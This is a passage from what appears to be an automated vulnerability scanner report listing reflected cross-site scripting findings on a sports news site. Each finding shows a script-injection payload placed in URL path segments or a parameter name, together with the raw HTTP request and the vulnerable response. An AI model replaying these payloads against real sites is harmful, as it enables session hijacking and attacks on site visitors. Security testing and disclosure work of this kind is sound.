Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12c2e20"><script>alert(1)</script>337775cf04b/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html">
...[SNIP]...

2.243. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d81e"><script>alert(1)</script>1ea0c328bf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/071d81e"><script>alert(1)</script>1ea0c328bf5/10/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/071d81e"><script>alert(1)</script>1ea0c328bf5/10/Text-to-Win-a-Flip-Sweepstakes/landing.html">
...[SNIP]...

2.244. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22d00"><script>alert(1)</script>3b9a8daff6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/1022d00"><script>alert(1)</script>3b9a8daff6a/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51718

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/07/1022d00"><script>alert(1)</script>3b9a8daff6a/Text-to-Win-a-Flip-Sweepstakes/landing.html">
...[SNIP]...

2.245. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 783a8"><script>alert(1)</script>753733aaae1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/10/Text-to-Win-a-Flip-Sweepstakes783a8"><script>alert(1)</script>753733aaae1/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/07/10/Text-to-Win-a-Flip-Sweepstakes783a8"><script>alert(1)</script>753733aaae1/landing.html">
...[SNIP]...

2.246. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696bb"><script>alert(1)</script>0b37ba3c0d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html?696bb"><script>alert(1)</script>0b37ba3c0d4=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51552

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="696bb"><script>alert(1)</script>0b37ba3c0d4" id = "696bb">
...[SNIP]...

2.247. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85497"><script>alert(1)</script>d032dfcbdb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1285497"><script>alert(1)</script>d032dfcbdb4/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/1285497"><script>alert(1)</script>d032dfcbdb4/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html">
...[SNIP]...

2.248. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a641b"><script>alert(1)</script>b77f2c3bf5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15a641b"><script>alert(1)</script>b77f2c3bf5a/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15a641b"><script>alert(1)</script>b77f2c3bf5a/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html">
...[SNIP]...

2.249. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ea7"><script>alert(1)</script>f3511ff7f64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/1040ea7"><script>alert(1)</script>f3511ff7f64/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15/1040ea7"><script>alert(1)</script>f3511ff7f64/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html">
...[SNIP]...

2.250. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e36ea"><script>alert(1)</script>b1b0878059d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encrue36ea"><script>alert(1)</script>b1b0878059d/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encrue36ea"><script>alert(1)</script>b1b0878059d/landing_word_streets.html">
...[SNIP]...

2.251. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81447"><script>alert(1)</script>a1306ad1405 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1281447"><script>alert(1)</script>a1306ad1405/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55333

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/1281447"><script>alert(1)</script>a1306ad1405/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html">
...[SNIP]...

2.252. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602af"><script>alert(1)</script>146ab9d7a83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15602af"><script>alert(1)</script>146ab9d7a83/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55314

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15602af"><script>alert(1)</script>146ab9d7a83/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html">
...[SNIP]...

2.253. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45c0e"><script>alert(1)</script>36e3d581f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<